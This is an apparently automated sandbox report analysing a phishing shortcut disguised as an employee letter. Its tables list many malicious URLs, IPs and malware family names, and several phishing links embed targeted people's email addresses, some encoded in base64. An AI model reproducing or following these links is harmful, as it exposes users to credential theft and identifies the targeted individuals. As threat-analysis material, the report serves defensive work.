URL: https://canseguros.com.br/homecoming/index#a2FyZW4uZ29sb3ZlcnNpY0BlbmFibGVjb21wLmNvbQ== Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: https://hmv.vomivane.ru/2b8wjV/#a2FyZW4uZ29sb3ZlcnNpY0BlbmFibGVjb21wLmNvbQ== Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
239.255.255.250	(Lhambright)VWAV.html	Get hash	malicious	Unknown	Browse
	https://usps.com-dscd.top/mum	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	https://ap1s.net/Dm7jH	Get hash	malicious	Unknown	Browse
	EFT Remittance_(Dmorris)CQDM.html	Get hash	malicious	Unknown	Browse
	https://www.google.co.id/url?q=sf_rand(2000)CHARtTPSJ3J3wDyycT&sa=t&esrc=sf_rand(2000)gECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=sf_rand(2000)RlDJVS0YXpPkDfJ6C&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/apcarpetcleaning.com.au%2Fkom%2Fwp-images%2Fpoom%0A%2Fsf_rand_string_mixed(24)/tmitchell@encorecompliance.com	Get hash	malicious	Unknown	Browse
	Timesheet ACH-Tbconsulting.November 16, 2024.html	Get hash	malicious	Unknown	Browse
	1So9BcQi1J.exe	Get hash	malicious	Stealc, Vidar	Browse
	https://whtt.termlicari.ru/HnkNbg/	Get hash	malicious	Unknown	Browse
	https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse
13.227.8.64	https://ipfs.io/ipfs/bafybeih7f27bkklyai5zhnf5s57wuee5khsdrrblepmiz5bozrxxoam2lq/index12.html#pdeneve@vanas.eu	Get hash	malicious	HTMLPhisher	Browse
	Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdf	Get hash	malicious	HTMLPhisher	Browse
	https://artsofbristy.com/?data=ZGdyaW5zdGVhZEBjaXR5b2Zyb3hib3JvLmNvbQ==	Get hash	malicious	Unknown	Browse
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.com	Get hash	malicious	HTMLPhisher	Browse
	https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Get hash	malicious	HTMLPhisher	Browse
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29t	Get hash	malicious	HTMLPhisher	Browse
	https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.org	Get hash	malicious	HTMLPhisher	Browse
	https://u48346967.ct.sendgrid.net/ls/click?upn=u001.A0zc-2BEvyk1Wl-2FMpdhEZeKOri2-2FGgH2RTzsX65VEcnN5SaLyl0UT8OMFIJrPp3PpoUM6xY28FQ2N7ftppG5RudDteJXD3BQZCthiPi2c2ALFGlSPfhe-2FcxhcglgWUQb-2BQESuvSP1z-2Bm6yiScj3t94MRtf0LYKB9CrrSBugAIE2LYG8LmYpSkH60B-2FMZ3-2BrvjbSA4-2FMKq-2BcyWHr8EPqNcLYpXKIa0eXlisYAn-2BUQ7zduW7tl-2BbLdZxK7-2F64kDFJWjAhA5-2BQkfVJJJox5IXYuhbutR70TtJJBVXs1-2BGpCmHbl-2BDNTOjQhDGBdV0GcWgnTqzbjbnvsgf-2Be0TXvdX5Smk9Cf3e70Q9X7CCHEUK7n5Iz83JVMEOM-2Fand-2B23jD1RrWlwwdn356TAiWPO93YBbqf0SO77Y7wdjJ1b9FY9HkvpCMIajIk8oGDIkalcOsvDrkfpAsNhyAACh29yO16Fg-2FM5u3K-2FXbE9Ex7FVSxGjaaC9sm3ZFKCHARATSNuZ5Fje0JCvs-2FuHNf8MhNMkgfl0FBuxcFtouETvn8R0InFl5AtNwGS6Afu60jlKV5PLEF8GeumMl4Zuoh2K-2F2yPQclKc1crfKqXCOnUQUzOQ7UyIpV0r3b47s6ht1AVAEPjV3zoZw9RLpCyXdGkoI8n06eY007Qg9WwLvy7We-2BQcl-2FyYQ4K56RiNFy6ideRccN4rvz5rlbEO4SM2GPwiXl06aWh1Z8A-3D-3DayVm_7jfNTkQybv-2BVetjXJenftZxQwKjBczDJqHH7EaznqVv3v2Dkt-2FIgZwJNXIp-2FyMqSeIPtfO34Zh0BJrBXMe8iDwc4F5cynKVd9U-2BCWNvBhYWndn5YPpcrm9EU-2BINyUV9MYoGCAzxOgZamtaAmmSvzUZGau9tG0E7vfYFw2WK2ssr4DmY5GXF-2BgMFUeEjp9HrYndaGnf0PXO4kOxtTViX7PlJWm1KFcSCvZKxLAfO2BkacR3B5XEdLDYpCUp92-2FH-2FHkhtVIRx1yIxGh6p91O9ZVon-2F9iC9RT46lS0PoWolD8OcxI1a8fShT6Hp4QWQfdHwSEy80yGx3wt6ImkGF4v9TXkQs-2Fsq-2FVFPoSnqaJLrItk8v5xWRdhyDRHKG-2BDTjP6JA9QphZ2npWlpDplGG-2B7VPrWDZBnEu36loOA6wRajUleT-2BwoMeGN4STY52Ur27KRveKCJr82irXKChZwqe-2BaUbmDOUwyLdpuYgAFKsd-2BPzSGCG9KIfFEO3qjrRe-2Ft9WxzxVxFb7rM1MFj1q2QSoqqpSZyyIO6o9dQWLpdkFrZCNwiV9o0NuRkda7B0vqLodHzU4jQ4E2ZVSRC2Gc87k08fCi-2BBF7Dmw-2F3-2FQYcQ-2BUHjUCqjlkaHmxOAI7-2FhdUS1Wb7BgsTAm-2Ft-2BvXBxupXitGd4JcEDUe0WuuxdFLUCWiEzHEB6DI0pZnKp0MjuL6t-2FHdSSyJSuzZQLJWoI1iWOBow7nssQ-2FtT6mq0c4kg9bIepJUAi8J12B9eClWiTZDtbREopSTPA0TrHAq8mBDFqCQ0MfGj13zUsahv2EEEPM5XcF8DfOVu-2BwcjmThtw28U2MS5BiDqE1Pwg-2BCEH40qmpHlF5lcXadw9ehGsQbMKc0VYqPjH2-2BLldks6uo-2Fln-2BeeieWNP8wXJfHHwtYJznNHWBqLw-3D-3D	Get hash	malicious	HTMLPhisher	Browse
162.241.2.141	quotation New Order I5117.exe	Get hash	malicious	FormBook	Browse	www.eduardoleonsilva.com/n8bs/?4hJLWJ=dFscc3ADPHmy8TWVKvwCOMwU5bUrQa/CizHl44ZiWA9r2IP2TSl8LSycOCDTN0nOZKJt&Mtx=0PvL86-xjV
13.227.8.47	https://ipfs.io/ipfs/bafybeih7f27bkklyai5zhnf5s57wuee5khsdrrblepmiz5bozrxxoam2lq/index12.html#pdeneve@vanas.eu	Get hash	malicious	HTMLPhisher	Browse
	Employee_Letter.pdf	Get hash	malicious	HTMLPhisher	Browse
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.com	Get hash	malicious	HTMLPhisher	Browse
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.uk	Get hash	malicious	HTMLPhisher	Browse
	https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Get hash	malicious	HTMLPhisher	Browse
	Employee_Bonus_Notlce.pdf	Get hash	malicious	Unknown	Browse
	https://www.wixsite.com/_api/invoice/2d5e7023-6014-4f5e-ab31-c1e25d999b96:9b27124a-a130-45dc-b81f-e5675b538826/view?token=56c18155-b636-4505-b95c-630f3d19901a	Get hash	malicious	HTMLPhisher	Browse
	AWB8674109965.html	Get hash	malicious	HTMLPhisher	Browse
	https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3D	Get hash	malicious	Unknown	Browse
	http://server.citierupticx.com/specId/product-mje%EF%BC%A0ml.avio.co.jp	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
d26p066pn2w0s0.cloudfront.net	https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	13.227.8.65
	https://ipfs.io/ipfs/bafybeih7f27bkklyai5zhnf5s57wuee5khsdrrblepmiz5bozrxxoam2lq/index12.html#pdeneve@vanas.eu	Get hash	malicious	HTMLPhisher	Browse	13.227.8.64
	Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdf	Get hash	malicious	HTMLPhisher	Browse	13.227.8.64
	https://artsofbristy.com/?data=ZGdyaW5zdGVhZEBjaXR5b2Zyb3hib3JvLmNvbQ==	Get hash	malicious	Unknown	Browse	13.227.8.64
	https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=	Get hash	malicious	HTMLPhisher	Browse	13.227.8.72
	Employee_Letter.pdf	Get hash	malicious	HTMLPhisher	Browse	13.227.8.47
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.com	Get hash	malicious	HTMLPhisher	Browse	13.227.8.64
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.uk	Get hash	malicious	HTMLPhisher	Browse	13.227.8.65
	Employee_Letter.pdf	Get hash	malicious	HTMLPhisher	Browse	13.227.8.72
	https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Get hash	malicious	HTMLPhisher	Browse	13.227.8.47

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, LummaC Stealer	Browse	104.26.0.231
	bad.txt	Get hash	malicious	AsyncRAT	Browse	104.21.84.67
	wp-cent.exe	Get hash	malicious	Python BackDoor	Browse	104.20.22.46
	wp-cent.exe	Get hash	malicious	Python BackDoor	Browse	104.20.22.46
	(Lhambright)VWAV.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://usps.com-dscd.top/mum	Get hash	malicious	Unknown	Browse	172.67.202.68
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.67.146
	https://ap1s.net/Dm7jH	Get hash	malicious	Unknown	Browse	172.67.73.44
	EFT Remittance_(Dmorris)CQDM.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	Timesheet ACH-Tbconsulting.November 16, 2024.html	Get hash	malicious	Unknown	Browse	172.66.47.118
AMAZON-02US	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	3.165.3.192
	6CWcISKhf1.msi	Get hash	malicious	AteraAgent	Browse	13.232.67.198
	https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	13.227.8.65
	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	18.217.199.157
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	65.3.229.89
	https://gmail.net-login.com/Xb1Rnb3pKRC9CUEdpbldIVTREbHhIK1Vza1NvaWlrblBIbkN4aUdCZUt0Y2NlSGJiWmZ2d0M1dTB5dEpRbnRoVDdBVkFTcEJqWGowNVZycWJNWHlIUHlLOG1qS0FvemVPSXpFRFhGcUhmaVU1ekQwMklrVmM0QjVpNmhLaDdoY1I4UlhMcFo1TTJaSFhtaWpiWWFqWGZ5WEg4TnBiOUl4MDI1RFMyWStQRFoyNFo5UFZNUUpmWXBtaUg0Y0FjUG1jejdSVnFVOXJQL2VzdmNLM1lEaWtmRkZnZEk2Vi0tVHFIeU0vOWxTN01YVEtXbS0tTTh5Skh1eEtsc0xTT0J5Rzg2Q2ZJQT09?cid=2330416057%3EOpen	Get hash	malicious	KnowBe4	Browse	52.217.121.192
	m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	13.122.1.33
	https://pdf.ac/3eQ2md	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	108.156.83.19
	file.exe	Get hash	malicious	ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar	Browse	13.249.9.35
	arm7.nn-20241219-1505.elf	Get hash	malicious	Mirai, Okiru	Browse	3.27.107.103
OIS1US	http://kiesermedicalcorporation.com/mklakdjhfhm/yftguihjo/anRvcnRvcmljaUBiaWdnZS5jb20=	Get hash	malicious	Unknown	Browse	162.241.3.4
	http://kiesermedicalcorporation.com/mklakdjhfhm/yftguihjo/anRvcnRvcmljaUBiaWdnZS5jb20=	Get hash	malicious	Unknown	Browse	162.241.3.4
	http://prntbl.concejomunicipaldechinu.gov.co	Get hash	malicious	Unknown	Browse	162.241.85.146
	https://inboxsender.gxsearch.club/redir6/serial.php	Get hash	malicious	Unknown	Browse	162.241.2.244
	MN1qo2qaJmEvXDP.exe	Get hash	malicious	FormBook	Browse	192.185.147.100
	https://jet.cloudhostingworks.com/CetQr/	Get hash	malicious	HTMLPhisher	Browse	162.241.71.126
	wva4mZuUb4.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	162.241.203.30
	Xc501VOacR.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	162.241.203.30
	umVoLahqZn.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	162.241.203.30
	tTXQS6DONV.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	162.241.203.30

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar	Browse	20.198.118.190
	8N8j6QojHn.dll	Get hash	malicious	Unknown	Browse	20.198.118.190
	8N8j6QojHn.dll	Get hash	malicious	Unknown	Browse	20.198.118.190
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	20.198.118.190
	PAYMENT ADVICE 750013-1012449943-81347-pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	20.198.118.190
	Tii6ue74NB.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar	Browse	20.198.118.190
	Non-Disclosure Agreement.html	Get hash	malicious	Unknown	Browse	20.198.118.190
	rs.lnk.d.lnk	Get hash	malicious	Unknown	Browse	20.198.118.190
	ny.lnk.d.lnk	Get hash	malicious	Unknown	Browse	20.198.118.190
	hnsadjhfg18De.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	20.198.118.190

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	2637
Entropy (8bit):	4.283816317558517
Encrypted:	false
SSDEEP:	48:SPnGe9PC5dJrUA4oCStJ+1EHVw9vgy1xPU6oFrVqNcBD00zj:SueA5dJYroCEJlVwlgy1xDChqNcBo0H
MD5:	641F96F6919FCED74BBA4CA9EE2AF594
SHA1:	4D0DDFB5DD384E9DD3C71C7C55840B0795E49744
SHA-256:	F44980DB205492AAB1DAA5120A033D91EE3653FD0655E86BFDF3862D17DD49B1
SHA-512:	C2C59BAC1DBDC1657CA96B7723D9E54B6987DA08A05E4F6275662316E62999809080CD10068B8849815AC2A0F71EF17AAC2CBE826311EF5860AFEAB93332652E
Malicious:	false
Reputation:	low
URL:	https://canseguros.com.br/homecoming/index
Preview:	<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>recognition</title>. <style>. * {. margin: 0;. padding: 0;. box-sizing: border-box;. }. . body {. display: flex;. justify-content: center;. align-items: center;. height: 100vh;. font-family: Arial, sans-serif;. background-color: #f4f4f9;. color: #333;. text-align: center;. }. . .container {. display: flex;. flex-direction: column;. justify-content: center;. align-items: center;. }. . .logo img {. width: 150px;. height: auto;. margin-bottom: 20px;. }. . .message {. font-size: 24px;. margin-bottom: 10px;. }. .

Chrome Cache Entry: 42

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13158
Entropy (8bit):	7.97659559095056
Encrypted:	false
SSDEEP:	192:lgcJmer5sZbYP6UtJ3Zs7bKQs8VzI24EFaMUumNCzdED5vDyq3opU47nKsPTtM6x:2Gl28Rfobu8624IqCBED577B4+Y
MD5:	424A444B66AA6CDFFB98696BB374F7E8
SHA1:	28192719595A439AD2CECB6E26F040426CE2C41D
SHA-256:	324124FC7CD32A03AD2C21C66375B8078F904FF60A5B961888E57C5F26A8A956
SHA-512:	B3CAE8336C40A751517F9C1B6BEE1C5970D73C8CF386700F85D35A3FDD7E9B4DD9AC3F3CD3A46BE31843A1CBE736EBEE668D750CB802D50498DB672DE79C04C0
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.............L\....3-IDATx...Y.].u'..#..w......j.b..E.)6EQ......7.^.^z......a.^..<v.....I.8..U..c.y..D..^.q...\..(.QXYw<..cO.=.-".r..E/.....^2.....x..%.^.z...^2.....x..%.^.z...^2.....x..%.^.z...^2../../..KD.1..?....VU..q%.....Y..Ea...N..a..<.o:.....M9.D..j<..F.~.?....y......c.R.....z.V...J.M.O<x!?..c.2.4.<..<..www...F...>.1.5...V:N.L..^.w.........%.7..i.............u].5F"....j....-ODKKK......y./..B..o4.D.........F...U\..j.rw..2...#._....4 ....;.......^............d.^D...$...@5r../.......t...3Zg.?8..........b.1..J.cIo.{..tO....E..WJ.W....7.........N....<]......+"...D@P.h..P.Hi.....#........A.>.O..x/h.%.......qcoo.Z;wW..I.5a8l].O..([.n.e2&..V@.2...` v...@.`..^....t.o...%`.XD...}....nr.Oh.gx.Q...Y..J..Wo~.a.f...+.6.\.....l.P.X..$......U./.3Z..,....snwwwoo.{?.k..?..&.L..dTUMwt{....M..8+[.r.....\|.../.{{.w..z.Y....}.....%..Q(.$W........_\|..O.P.x.V..i.......w.I]6...6.V[........o.{.k.YBA.....{......>W...z.....].r...'.G)...<.+.

Chrome Cache Entry: 43

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	13158
Entropy (8bit):	7.97659559095056
Encrypted:	false
SSDEEP:	192:lgcJmer5sZbYP6UtJ3Zs7bKQs8VzI24EFaMUumNCzdED5vDyq3opU47nKsPTtM6x:2Gl28Rfobu8624IqCBED577B4+Y
MD5:	424A444B66AA6CDFFB98696BB374F7E8
SHA1:	28192719595A439AD2CECB6E26F040426CE2C41D
SHA-256:	324124FC7CD32A03AD2C21C66375B8078F904FF60A5B961888E57C5F26A8A956
SHA-512:	B3CAE8336C40A751517F9C1B6BEE1C5970D73C8CF386700F85D35A3FDD7E9B4DD9AC3F3CD3A46BE31843A1CBE736EBEE668D750CB802D50498DB672DE79C04C0
Malicious:	false
Reputation:	low
URL:	https://logo.clearbit.com/enablecomp.com
Preview:	.PNG........IHDR.............L\....3-IDATx...Y.].u'..#..w......j.b..E.)6EQ......7.^.^z......a.^..<v.....I.8..U..c.y..D..^.q...\..(.QXYw<..cO.=.-".r..E/.....^2.....x..%.^.z...^2.....x..%.^.z...^2.....x..%.^.z...^2../../..KD.1..?....VU..q%.....Y..Ea...N..a..<.o:.....M9.D..j<..F.~.?....y......c.R.....z.V...J.M.O<x!?..c.2.4.<..<..www...F...>.1.5...V:N.L..^.w.........%.7..i.............u].5F"....j....-ODKKK......y./..B..o4.D.........F...U\..j.rw..2...#._....4 ....;.......^............d.^D...$...@5r../.......t...3Zg.?8..........b.1..J.cIo.{..tO....E..WJ.W....7.........N....<]......+"...D@P.h..P.Hi.....#........A.>.O..x/h.%.......qcoo.Z;wW..I.5a8l].O..([.n.e2&..V@.2...` v...@.`..^....t.o...%`.XD...}....nr.Oh.gx.Q...Y..J..Wo~.a.f...+.6.\.....l.P.X..$......U./.3Z..,....snwwwoo.{?.k..?..&.L..dTUMwt{....M..8+[.r.....\|.../.{{.w..z.Y....}.....%..Q(.$W........_\|..O.P.x.V..i.......w.I]6...6.V[........o.{.k.YBA.....{......>W...z.....].r...'.G)...<.+.

Static File Info

General

File type:	MS Windows 95 Internet shortcut text (URL=<https://canseguros.com.br/homecoming/index#a2FyZW4uZ29sb3ZlcnNpY0BlbmFibGVjb21wLmNvbQ==>), ASCII text, with CRLF line terminators
Entropy (8bit):	5.485409153832761
TrID:	Windows URL shortcut (11001/1) 91.66% Generic INI configuration (1001/1) 8.34%
File name:	Employee_Letter.PDFuJPefyDW1j.url
File size:	187 bytes
MD5:	f58499b1114a28df07b9ad0b4f786b8d
SHA1:	b56fe6598f3761afe8410958af1c682e0a6bc676
SHA256:	004fe84cbb9c83b2fa4bf16120fb03b0b243e7737007187a0efc21f0639fcb29
SHA512:	635a6b9f25990d808782783986e1bb3b4a636066c6868550ac043ed3e1f8b1e4b7d434f34e0a19fd8c7c9d9d1bbf9f75de79957ad982b42ff98dbd2c2196f516
SSDEEP:	3:HRAbABGQYm2fBLWQd1HKIMLCKa4xAW/I9OwYaW9Yo/E4ovtKRPsQGGjkyM1eARH:HRYFVm40zNCl289DhMF8lv4RPsFGjkyk
TLSH:	4AC02224A30C84308391640260188E1CDC2BAC88943DC9E8139C0E08AC800DC2E0C924
